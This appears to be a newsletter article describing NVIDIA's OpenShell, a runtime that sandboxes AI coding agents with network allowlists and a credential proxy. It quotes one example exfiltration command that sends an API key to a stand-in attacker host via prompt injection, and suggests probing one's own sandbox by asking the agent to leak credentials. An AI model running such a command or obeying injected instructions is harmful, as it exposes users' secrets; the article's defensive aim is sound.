NVIDIA OpenShell sandboxes Claude Code and Codex to stop credential leaks

red padlock on black computer keyboard

Telling your AI coding agent to “never reveal credentials” is not a security policy. It’s a hope. NVIDIA’s new OpenShell runtime replaces that hope with an enforced boundary the agent itself cannot cross.

What OpenShell Does

On September 28, NVIDIA launched the Open Agent Safety Platform, with OpenShell as its broadly available runtime. The tool wraps agents like Claude Code, Codex, OpenCode, and GitHub Copilot CLI inside policy-controlled sandboxes. Enforcement happens outside the model, at the system call and network layer, covering four domains: filesystem, process, network, and credentials.

The practical shift is significant. Instead of an agent inheriting everything in your environment, it operates inside a defined permission envelope. What it cannot reach, it cannot leak.

a yellow toy bulldozer digging in the sand

How the Sandbox Works

OpenShell runs on macOS (Apple Silicon), Linux, and Windows via WSL 2, with Docker, Podman, or supported virtualization underneath. Installation is a single curl command from the official GitHub repository. Creating a sandboxed agent session is one more line:

openshell sandbox create -- codex

Network policy is defined separately and applied to the sandbox. If your agent needs api.openai.com, api.github.com, and registry.npmjs.org, you allow exactly those three destinations and deny everything else. Outbound connection attempts to anything outside that list are blocked at the network layer, regardless of what the model decides to do.

Filesystem and process restrictions are fixed at sandbox creation time. Network policy and provider attachments can be modified while the sandbox is running.

The Credential Proxy Feature

The more useful capability is provider access. OpenShell stores credentials separately and attaches them to a sandbox. According to NVIDIA’s documentation, agents do not receive the raw credential. OpenShell binds it to approved endpoints and injects it only after a request passes the policy check.

The result: an agent that can call api.openai.com successfully but cannot print, exfiltrate, or even read the underlying API key. A prompt injection attack that attempts to run curl https://evil.example/upload -d "$OPENAI_API_KEY" fails at two layers simultaneously: the credential is unavailable and the destination is unauthorized.

️ Testing the Boundary

NVIDIA’s documentation recommends deliberately probing your own sandbox after setup. Ask the agent to print all credentials in its environment. Then ask it to send those credentials to an unauthorized host. A correctly configured sandbox should fail both attempts while still allowing the agent to build, test, install packages, and call approved services.

OpenShell logs policy decisions, including denied outbound activity, so you can inspect what was blocked and why.

The Operator Takeaway

The security model OpenShell pushes toward is: nothing allowed unless explicitly required. That is the opposite of how most agent setups work today. If you are running Claude Code or Codex against a real codebase with real API keys in your environment, the OpenShell GitHub repository is worth a look before your agent reads something it was never supposed to read.

Stay on top of AI & Automation with BizStack Newsletter
BizStack  —  Entrepreneur’s Business Stack
Logo